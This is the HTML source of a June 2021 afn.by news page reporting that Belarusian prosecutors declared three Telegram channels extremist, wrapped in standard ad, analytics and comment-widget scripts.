
<!DOCTYPE html>
<html>
<head><title>
	Еще ряд Telegram-каналов признан в Беларуси экстремистскими | Беларусь Интернет | АФН | Белорусские новости | Республика Беларусь | Минск
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta property="og:image" content="/images/logo.gif" /><link rel="alternate" type="application/rss+xml" title="AFN.BY - Новости Беларуси" href="/news/rss/" /><link rel="icon" href="https://afn.by/favicon.ico" type="image/x-icon" />
    <link href="/styles/cocss.css?v=2020-09-16T2305" rel="stylesheet" type="text/css" />
    <!--[if lte IE 6]>
    <link href="/styles/ie6.css" rel="stylesheet" type="text/css" />
	<![endif]-->
	
	<meta name="keywords" content="Беларусь Интернет По заявлениям прокуратуры Центрального района Минска информпродукция Telegram-каналов &#171;Лебяжий 97%&#187;, &#171;Лебяжий 97 % чат&#187;, &#171;Центральный 97%&#187; признана экстремистской.  Об этом говорится в сообщении Генпрокуратуры РБ." /><meta name="description" content="По заявлениям прокуратуры Центрального района Минска информпродукция Telegram-каналов &#171;Лебяжий 97%&#187;, &#171;Лебяжий 97 % чат&#187;, &#171;Центральный 97%&#187; признана экстремистской.  Об этом говорится в сообщении Генпрокуратуры РБ." /> 
	<link rel="stylesheet" type="text/css" href="/styles/cocss2.css" />
	

	<script>
	  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
	  ga('create', 'UA-261460-1', 'auto');
	  ga('send', 'pageview');
	</script>
	<script type="text/javascript">
	<!--//--><![CDATA[//><!--
	var pp_gemius_identifier = new String('chuaoc_Qf5oBaF0jf1u_J5PaDqti6EO9B3Q0cN4cczz.H7');
	var pp_gemius_hitcollector = 'gaby.hit.gemius.pl';
	//--><!]]>
	</script>
	<script type="text/javascript" src="/scripts/xgemius.js"></script>
	<script type='text/javascript'>
	(function() {
		var w = window,
		d = document,
		protocol =/https/i.test(w.location.protocol) ? 'https:' : 'http:',
		aml = typeof admixerML !== 'undefined' ? admixerML : { };
		aml.fn = aml.fn || [];
		aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
		aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
		if (!w.admixerML) {
			var lodash = document.createElement('script');
			lodash.id = 'amlScript';
			lodash.async = true;
			lodash.type = 'text/javascript';
			lodash.src = aml.cdnPath + 'scripts3/loader2.js';
			var node = d.getElementsByTagName('script')[0];
			node.parentNode.insertBefore(lodash, node);
			w.admixerML = aml;
		}
	})();
	</script>
	<script type='text/javascript'>
		admixerML.fn.push(function() {
                admixerML.defineSlot({z: '2febba63-69cc-42a7-8be2-e10bcbe63cd5', ph: 'admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.defineSlot({z: 'a95e2ad3-94ac-4d52-9a1c-87227345965a', ph: 'admixer_a95e2ad394ac4d529a1c87227345965a_zone_16335_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.singleRequest();
	});
	</script>
<script data-ad-client="ca-pub-5271363197717881" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!--giraffio start
<script type="text/javascript" src="//code.giraff.io/data/widget-afnby.js" async></script>
<!--giraffio end-->
<link href="/WebResource.axd?d=THc8N3S2QkNQqMfl-WTie7cxeKRizU7tc7N60RHbrcj44yBJsW2ah91bqt1hozGOVJ9Lzyy6wzJ7Z4fWBM68ZUFq0yxae3Ry3Yc6Qseymu-MWSkniP2-WFm9EjR0giB-Ss2ocLqAtGS3ptB3kqGNqw2&amp;t=633477618823728610" type="text/css" rel="stylesheet" /></head>
<script type="text/javascript">
	<!--
	var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
	//-->
</script>
<body>
    <!--div style="height:10px;"></div-->
    <form method="post" action="./289765?docid=289765&amp;doctype=news" id="form1">
<input type="hidden" name="C_C_SM_HiddenField" id="C_C_SM_HiddenField" value="" />
<input type="hidden" name="__VIEWSTATE_KEY" id="__VIEWSTATE_KEY" value="VIEWSTATE_107.23.218.4_637601396274587349" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" />


<script type="text/javascript">
//<![CDATA[
var __cultureInfo = {"name":"ru-RU","numberFormat":{"CurrencyDecimalDigits":2,"CurrencyDecimalSeparator":",","IsReadOnly":true,"CurrencyGroupSizes":[3],"NumberGroupSizes":[3],"PercentGroupSizes":[3],"CurrencyGroupSeparator":" ","CurrencySymbol":"₽","NaNSymbol":"не число","CurrencyNegativePattern":8,"NumberNegativePattern":1,"PercentPositivePattern":1,"PercentNegativePattern":1,"NegativeInfinitySymbol":"-∞","NegativeSign":"-","NumberDecimalDigits":2,"NumberDecimalSeparator":",","NumberGroupSeparator":" ","CurrencyPositivePattern":3,"PositiveInfinitySymbol":"∞","PositiveSign":"+","PercentDecimalDigits":2,"PercentDecimalSeparator":",","PercentGroupSeparator":" ","PercentSymbol":"%","PerMilleSymbol":"‰","NativeDigits":["0","1","2","3","4","5","6","7","8","9"],"DigitSubstitution":1},"dateTimeFormat":{"AMDesignator":"","Calendar":{"MinSupportedDateTime":"\/Date(-62135596800000)\/","MaxSupportedDateTime":"\/Date(253402289999999)\/","AlgorithmType":1,"CalendarType":1,"Eras":[1],"TwoDigitYearMax":2029,"IsReadOnly":true},"DateSeparator":".","FirstDayOfWeek":1,"CalendarWeekRule":2,"FullDateTimePattern":"d MMMM yyyy \u0027г.\u0027 H:mm:ss","LongDatePattern":"d MMMM yyyy \u0027г.\u0027","LongTimePattern":"H:mm:ss","MonthDayPattern":"d MMMM","PMDesignator":"","RFC1123Pattern":"ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","ShortDatePattern":"dd.MM.yyyy","ShortTimePattern":"H:mm","SortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","TimeSeparator":":","UniversalSortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","YearMonthPattern":"MMMM yyyy","AbbreviatedDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"ShortestDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"DayNames":["воскресенье","понедельник","вторник","среда","четверг","пятница","суббота"],"AbbreviatedMonthNames":["янв","фев","мар","апр","май","июн","июл","авг","сен","окт","ноя","дек",""],"MonthNames":["Январь","Февраль","Март","Апрель","Май","Июнь","Июль","Август","Сентябрь","Октябрь","Ноябрь","Декабрь",""],"IsReadOnly":true,"NativeCalendarName":"григорианский календарь","AbbreviatedMonthGenitiveNames":["янв","фев","мар","апр","мая","июн","июл","авг","сен","окт","ноя","дек",""],"MonthGenitiveNames":["января","февраля","марта","апреля","мая","июня","июля","августа","сентября","октября","ноября","декабря",""]},"eras":[1,"наша эра",null,0]};//]]>
</script>

<script src="/ScriptResource.axd?d=akSou45Evp7QYCR6rCy7htnANdHwjDkxFyw36HKSo-8wMdXD9de7URVRMYA51QOIzoWdyxwX0sMjwWU2TzMx4l4Qae2TLQlFVihq1iCOjWSjxpMfsK79SS6cB6nWo__eoZfe-4JwvmEnb7dZSD-vXPY4VBsSz_iUFM1z9dz-vw41&amp;t=4f7d5f1" type="text/javascript"></script>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdADyvVXD1oYELeveMr0vHCmYPo85tPue0O/g9WbaytM9Xf59UvwfzmL/X0Jof4zpdarsAjs4r00pc8y0mpILnMXtS2P8vJhmnaBErAHbUOxqfSIJb/qP5DcR4VPSt76bgVgycADeYjn0LZReQHVdEqpdVzKK1WRu73UfbMGdeLCRvzefFlMxiavprMkQkV5JN/moL6BVs/qwwA3DBzWoXSB44ULsyxFAkFxzE+RnztwYH75ULQt2ZmCwKNs/voqmnmnO1h7tGZXXPjs9iq3TI1I9UvF2ud21oA4CDDB8PpM+ZnG9v+nQ0/a1zI07IHNy49K5F9K0CCAbt//VGXScteQvFOzCT1LISyxlIgBuKbX0U124ikrXDTEzQBsE3bvz2862I1n27f5yt8shsG1cunZtDtSvag5FetPrpqBKkel4fICTKdaqFHyTvS5G9yrS7yrv5yb7Dczh+Xu0yfAk7BmziI5iz9JX5epR/zUcKHM1elqaxYbhKtKuf5+vGyiBBqJc6Zz2DT2sc0tV1e3pc+5PqB4IQylZ2adh7xBFqY1tylOrNY6bZHwGPxCsPAGwoZJVtpSlt0RHVTSc/C0MtkvMaSu4ch6qBtkarEOu61Sfn9v0uVwApu1Br2PZ27VCIgnA5hFasRHq+x289VRlOsaq/3uHjoQUNbYPACRONh7kz7JN828TEe58MyfOepgEkVRJLrJLvnJeGeE5uq/4WU9FK9xikT007LDjZOjb9AlmGRtJ/xYWAXWG0XWG10vkJAhVV1+aipFYxVgS1c5hhIvJrtqF5sRkfy3U22/5GLtqY6/NRdknyqpsjUEsMZC9ubQucIC+SUQbgbgLZhga4yx0i8vIjdDNhswehl2vx+puipGuY40GRwcVvQhmD6YRcwAnsHAUlznqBgdJM+ADCLNIGPw+9re2oSqYgp3ob5VfTC40Gt69zeXuSZDwk6yMAhFtUrli9YiwsOb3E1Sfx+c/4YtIe6DoaFTynI8Ql5ewGX3HSY2Whey+6m7v+7V5oV2sxqcgNC2fSPE6CAQK3t+PfYS1EVmQBFAkM6itxWNNSCwf0PZhnMiChNERsIYD0ayjac+6a3L2KXG/fa2ySuObqAtyYJU99YG8cLldJrtIR6XygG+LX0JLZHIdlZAGVV5pU3rmFKPX5juFUkXsNQTL4MCeDbO/APwzU1WU10T0zmg88iQkxqFCm4ukYAol1wq4EE9B7OydtBOdI0Fey8w/zq790MB51gydfPb0TbW5WoOTJCzXuc3vlvKgewku1mAOWKhVMdTgfIUNtUhYORGiomV9dXJCnBPuhqvZGOvj+Jg==" />
		
		<div style="margin: 10px auto 20px;">
			<div id='admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'></div>
		</div>
		<script type='text/javascript'>
		admixerML.fn.push(function() { admixerML.display('admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'); });
		</script>
		<div id="hd">
			<div id="logo">
				<a href="../../"><img src="/images/logo.gif" alt="АФН - Белорусское информационное агенство" width="120" height="60" border="0" /></a>
			</div>
			<div class="c">
				<ul id="toolbar">
					<li class="first"><a href="../../">Главная</a>&nbsp;&nbsp;</li><li><a href="../../news">Новости</a></li><li><a href="../../finances">Финансы</a></li><li><a href="../../oil">Нефть</a></li>
				</ul>
				<ul id="additional_toolbar">
					<li><a href="/sitemap">Карта сайта</a></li>
				</ul>
				<br />
				
				<div class="info">Последнее обновление: 24.06.2021 13:25</div>
				
			</div>
			
		</div>
        	
	<div id="container">
		<div id="content">
			<div class="wrapper">
				<!--:/news/i/289765:-->
<div class="banner-placeholder">
<!-- Yandex.RTB R-A-465488-1 -->
<div id="yandex_rtb_R-A-465488-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-1",
                renderTo: "yandex_rtb_R-A-465488-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
</div>

				
	
    
<div id="d289765" class="doc">
    <div class="hd">
        
        <h1>Еще ряд Telegram-каналов признан в Беларуси экстремистскими</h1>
        
	<div style="float:left;font-size:1em;margin-right: 20px;">
        <div><span><a href="../2021/06/24">24.06.2021 12:40</a></span>&nbsp;|&nbsp;<span><a href="http://afn.by" rel="nofollow" target="_blank">АФН</a></span></div>
        
        <div>Категории: <a href="../category/1,1">Беларусь</a> <a href="../category/2,223">Интернет</a></div>
	    
	</div>
	<div id="fb-root" style="margin-top:10px;"></div><script src="//connect.facebook.net/en_US/all.js#appId=177634385630657&amp;xfbml=1"></script><fb:like href="" send="true" layout="button_count" width="250" show_faces="true" font="trebuchet ms"></fb:like>
    </div>
    <div class="bd">
    <p>По заявлениям прокуратуры Центрального района Минска информпродукция Telegram-каналов «Лебяжий 97%», «Лебяжий 97 % чат», «Центральный 97%» признана экстремистской.  Об этом говорится в сообщении Генпрокуратуры РБ.</p><p>«Прокуратура Центрального района Минска проанализировала информационные сообщения, размещенные в Telegram-каналах «Лебяжий 97%», «Лебяжий 97 % чат», «Центральный 97%». Установлено, что на указанных интернет-ресурсах публикуются информационные сообщения с призывами к участию с несанкционированных массовых мероприятиях, хулиганским действиям, применению насилия к представителям органов государственной власти, в том числе сотрудникам органов внутренних дел, а также сообщения оскорбительного характера, разжигающие социальную вражду и рознь, содержащие пропаганду насильственных действий по мотивам вражды и ненависти в отношении группы граждан по профессиональному признаку», - написало ведомство.</p><p>Исходя из этого, информационная продукция вышеперечисленных Telegram-каналов признана "экстремистскими материалами".</p><p>«Опубликование либо размещение материалов из названных Telegram-каналов впредь будет влечь наступление ответственности по ст. 19.11 Кодекса Республики Беларусь об административных правонарушениях», - предупреждает Генпрокуратура. </p>
    </div>
    <div class="ft"></div>
</div>
    <div class="clear" style="width:99%;">
		
		<div class="clear"></div>
		
<div class="l">

	<div class="hd">
		Ранее по теме
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/289205">
				<span class="time">27.05 11:32</span> <span class="title">Hoster.by сообщила об ограничениях на «некоторые» исходящие операции по счетам</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288732">
				<span class="time">03.05 13:43</span> <span class="title">Instagram удалил аккаунт Народного антикризисного управления</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288543">
				<span class="time">23.04 12:37</span> <span class="title">Еще один Telegram-канал в Беларуси признали экстремистским</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/284241">
				<span class="time">18.11 13:46</span> <span class="title">ОАЦ подчистил перечень поставщиков интернет-услуг для госорганов</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/277802">
				<span class="time">15.07 11:51</span> <span class="title">Spotify уже доступен в Беларуси, дороже чем в России</span>
				</a>
			</li>
		
			</ul>
		
</div>

    </div>
	<div class="clear"></div>
<br><br>
<!--LuckyAds-->
<!--<div data-la-block="4e3e7c89-f061-45c3-9ca4-e90e26604ad9"></div>-->
<!-- Composite Start 
<div id="M617914ScriptRootC973088"></div>
<script src="https://jsc.lentainform.com/a/f/afn.by.973088.js" async></script>
<!-- Composite End -->
<script async src="https://an.yandex.ru/system/widget.js"></script>
<script>
    (yaads = window.yaads || []).push({
        id: "465488-8",
        render: "#id-465488-8"
    });
</script>
<div id="id-465488-8"></div>


<!--giraff-->
<!--<div id="grf_afnby_2"></div>--->
<!--<div id="M242oY8Bs7fkyrP7JVbL" data-type="2" class="blockOfO1b2l3"></div>-->

    
<div class="clear"></div>
<div id="disqus_thread"></div>
<script type="text/javascript">
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'afnby'; // required: replace example with your forum shortname

    // The following are highly recommended additional parameters. Remove the slashes in front to use.
    // var disqus_identifier = 'unique_dynamic_id_1234';
    // var disqus_url = 'http://example.com/permalink-to-page.html';

    var disqus_identifier = 'afnby_news_289765';

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
<noindex>
<a href="//disqus.com" class="dsq-brlink" rel="nofollow">blog comments powered by <span class="logo-disqus">Disqus</span></a>
</noindex>

<!--

<div id="comments">
    <div class="hd" style="display:none">
		<h4>Комментарии</h4>
    	
	</div>
    
</div>


-->
<!--
<span id="C_C_Co_CommentsClosedLabel" class="commentsClosed">Комментарии запрещены</span>
-->
    
    
				<div class="adv clear">
					<!--2657565487752-->
				</div>
			</div>
		</div>
		<div id="info">			
			
	<div id="C_I_Ca" class="calendar"><div class="c"><table id="C_I_PC" cellspacing="0" cellpadding="2" title="Calendar">
	<tr><td colspan="7" bgcolor="Silver"><table cellspacing="0" width="100%">
		<tr><td width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7761')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" width="70%">Май 2021</td><td align="right" width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7822')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" width="14%">26</td><td align="center" width="14%">27</td><td align="center" width="14%">28</td><td align="center" width="14%">29</td><td align="center" width="14%">30</td><td align="center" width="14%"><a href="/news/2021/05/01">1</a></td><td align="center" width="14%"><a href="/news/2021/05/02">2</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/05/03">3</a></td><td align="center" width="14%"><a href="/news/2021/05/04">4</a></td><td align="center" width="14%"><a href="/news/2021/05/05">5</a></td><td align="center" width="14%"><a href="/news/2021/05/06">6</a></td><td align="center" width="14%"><a href="/news/2021/05/07">7</a></td><td align="center" width="14%"><a href="/news/2021/05/08">8</a></td><td align="center" width="14%"><a href="/news/2021/05/09">9</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/05/10">10</a></td><td align="center" width="14%"><a href="/news/2021/05/11">11</a></td><td align="center" width="14%"><a href="/news/2021/05/12">12</a></td><td align="center" width="14%"><a href="/news/2021/05/13">13</a></td><td align="center" width="14%"><a href="/news/2021/05/14">14</a></td><td align="center" width="14%"><a href="/news/2021/05/15">15</a></td><td align="center" width="14%"><a href="/news/2021/05/16">16</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/05/17">17</a></td><td align="center" width="14%"><a href="/news/2021/05/18">18</a></td><td align="center" width="14%"><a href="/news/2021/05/19">19</a></td><td align="center" width="14%"><a href="/news/2021/05/20">20</a></td><td align="center" width="14%"><a href="/news/2021/05/21">21</a></td><td align="center" width="14%"><a href="/news/2021/05/22">22</a></td><td align="center" width="14%"><a href="/news/2021/05/23">23</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/05/24">24</a></td><td align="center" width="14%"><a href="/news/2021/05/25">25</a></td><td align="center" width="14%"><a href="/news/2021/05/26">26</a></td><td align="center" width="14%"><a href="/news/2021/05/27">27</a></td><td align="center" width="14%"><a href="/news/2021/05/28">28</a></td><td align="center" width="14%"><a href="/news/2021/05/29">29</a></td><td align="center" width="14%"><a href="/news/2021/05/30">30</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/05/31">31</a></td><td align="center" width="14%">1</td><td align="center" width="14%">2</td><td align="center" width="14%">3</td><td align="center" width="14%">4</td><td align="center" width="14%">5</td><td align="center" width="14%">6</td></tr>
</table></div><div class="c"><table id="C_I_C" cellspacing="0" cellpadding="2" title="Calendar">
	<tr><td colspan="7" bgcolor="Silver"><table cellspacing="0" width="100%">
		<tr><td width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7791')" style="color:Black" title="Go to the previous month"></a></td><td align="center" width="70%">Июнь 2021</td><td align="right" width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7852')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" width="14%">31</td><td align="center" width="14%"><a href="/news/2021/06/01">1</a></td><td align="center" width="14%"><a href="/news/2021/06/02">2</a></td><td align="center" width="14%"><a href="/news/2021/06/03">3</a></td><td align="center" width="14%"><a href="/news/2021/06/04">4</a></td><td align="center" width="14%"><a href="/news/2021/06/05">5</a></td><td align="center" width="14%"><a href="/news/2021/06/06">6</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/06/07">7</a></td><td align="center" width="14%"><a href="/news/2021/06/08">8</a></td><td align="center" width="14%"><a href="/news/2021/06/09">9</a></td><td align="center" width="14%"><a href="/news/2021/06/10">10</a></td><td align="center" width="14%"><a href="/news/2021/06/11">11</a></td><td align="center" width="14%"><a href="/news/2021/06/12">12</a></td><td align="center" width="14%"><a href="/news/2021/06/13">13</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/06/14">14</a></td><td align="center" width="14%"><a href="/news/2021/06/15">15</a></td><td align="center" width="14%"><a href="/news/2021/06/16">16</a></td><td align="center" width="14%"><a href="/news/2021/06/17">17</a></td><td align="center" width="14%"><a href="/news/2021/06/18">18</a></td><td align="center" width="14%"><a href="/news/2021/06/19">19</a></td><td align="center" width="14%"><a href="/news/2021/06/20">20</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/06/21">21</a></td><td align="center" width="14%"><a href="/news/2021/06/22">22</a></td><td align="center" width="14%"><a href="/news/2021/06/23">23</a></td><td align="center" bgcolor="Silver" width="14%"><font color="White"><a href="/news/2021/06/24">24</a></font></td><td class="future" align="center" width="14%">25</td><td class="future" align="center" width="14%">26</td><td class="future" align="center" width="14%">27</td></tr><tr><td class="future" align="center" width="14%">28</td><td class="future" align="center" width="14%">29</td><td class="future" align="center" width="14%">30</td><td class="future" align="center" width="14%">1</td><td class="future" align="center" width="14%">2</td><td class="future" align="center" width="14%">3</td><td class="future" align="center" width="14%">4</td></tr><tr><td class="future" align="center" width="14%">5</td><td class="future" align="center" width="14%">6</td><td class="future" align="center" width="14%">7</td><td class="future" align="center" width="14%">8</td><td class="future" align="center" width="14%">9</td><td class="future" align="center" width="14%">10</td><td class="future" align="center" width="14%">11</td></tr>
</table></div></div>
	<div class="clear"></div>
	
<div class="l">

	<div class="hd">
		Политика
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/289770">
				<span class="time">24.06 13:23</span> <span class="title">Советник Тихановской: Макей шантажирует глав МИД ЕС свободой политзаключенных</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289766">
				<span class="time">24.06 12:50</span> <span class="title">Генпрокуратура РБ: Насчет допроса Протасевича к нам из ЛНР официально не обращались</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289762">
				<span class="time">24.06 11:35</span> <span class="title">Беларусь направит запрос в Латвию в отношении 22 ныне живых эсэсовцев</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289746">
				<span class="time">23.06 19:02</span> <span class="title">Литва намерена обратиться к Беларуси за помощью по инциденту с лайнером Ryanair</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289743">
				<span class="time">23.06 17:24</span> <span class="title">Дебаты в ПАСЕ: Режим санкций против Лукашенко должен быть усилен</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289742">
				<span class="time">23.06 17:21</span> <span class="title">Члену КС Луцкиной продлили срок содержания под стражей</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289739">
				<span class="time">23.06 13:36</span> <span class="title">Основательнице Пресс-клуба Юлии Слуцкой продлен срок содержания под стражей</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289736">
				<span class="time">23.06 12:21</span> <span class="title">Головченко: Будем укреплять обороноспособность в условиях экономической агрессии</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289733">
				<span class="time">23.06 11:48</span> <span class="title">Министр обороны Беларуси отметился скандальными заявлениями на конференции</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289730">
				<span class="time">23.06 10:24</span> <span class="title">Лукашенко все еще пытается продать Европе защиту от мигрантов, наркотиков и сигарет</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289725">
				<span class="time">23.06 08:18</span> <span class="title">ФРГ и Австрия поплатились за политику «умиротворения» диктатора</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289721">
				<span class="time">23.06 07:38</span> <span class="title">Власти продлили Василевичу срок содержания под стражей</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289718">
				<span class="time">23.06 07:17</span> <span class="title">Правозащитники: Режим Лукашенко полностью игнорирует закон в отношении инакомыслящих</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289717">
				<span class="time">22.06 17:48</span> <span class="title">Головченко признался, что власти уже давно готовились к санкциям</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289714">
				<span class="time">22.06 15:53</span> <span class="title">Фильм "Лукашенко. Золотое дно" признан экстремистским</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289711">
				<span class="time">22.06 14:58</span> <span class="title">Прокурор запросил 15 лет лишения свободы для Виктора Бабарико</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289710">
				<span class="time">22.06 14:41</span> <span class="title">МИД РБ: Санкции ЕС граничат с объявлением экономической войны</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289706">
				<span class="time">22.06 11:40</span> <span class="title">Китаю не понравились санкции Евросоюза в отношении Беларуси</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289703">
				<span class="time">22.06 10:15</span> <span class="title">Блок Меркель в предвыборной программе призвал ЕС и НАТО усилить позицию по РФ</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289699">
				<span class="time">22.06 09:26</span> <span class="title">Посол РФ обещает поддержку властей Беларуси вплоть до "критических обстоятельств"</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289694">
				<span class="time">22.06 08:19</span> <span class="title">В Европарламенте надеются, что санкции побудят Лукашенко к диалогу с оппозицией</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289693">
				<span class="time">21.06 23:06</span> <span class="title">США ввели визовые санкции в отношении 46 белорусских чиновников</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289692">
				<span class="time">21.06 19:39</span> <span class="title">Боррель анонсировал секторальные санкции ЕС против режима Лукашенко</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289690">
				<span class="time">21.06 18:10</span> <span class="title">Великобритания ввела санкции против 11 физлиц и 2 организаций Беларуси</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/289689">
				<span class="time">21.06 18:08</span> <span class="title">Канада ввела санкции против 17 физлиц и 5 организаций Беларуси</span>
				</a>
			</li>
		
			</ul>
		
</div>

	<!--False-->

			<div class="adv clear">
<!-- Yandex.RTB R-A-465488-2 -->
<div id="yandex_rtb_R-A-465488-2"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-2",
                renderTo: "yandex_rtb_R-A-465488-2",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
<!-- sidebar start -->
<!--<div id="grf_afnby"></div>-->
<!-- sidebar end -->

</div>

		<!--	-->
</div>
		<div id="nav">
			<div>
				<br />
				<ul id="menu">
					<li><a href="../top">Главное</a></li>
					
							
							<li><a href="../politics">Политика</a></li>
						
							<li><a href="../economy">Экономика</a></li>
						
							<li><a href="../energy">Энергетика</a></li>
						
							<li><a href="../social">Общество</a></li>
						
						
				</ul>
			</div>
			
			
			<div class="redBtn">
				<a href="/news/i/279946">afn.by заблокирован Мининформом<br><br>Помоги сайту</a>
			</div>
			
		</div>
	</div>

		<div id="ft">
			<div class="c">
				&copy; 1995-2019 УП "Ньюс-Релиз"<br />
				<a href="../../contacts">Контактная информация</a> | <a href="../../copyrights">Права на использование</a>
			</div>
			<div class="clear">
			</div>
			
	

		</div>
    </form>
<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(421539, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true,
        trackHash:true
   });
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/421539" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!-- Sape counter -->
<script type="text/javascript">
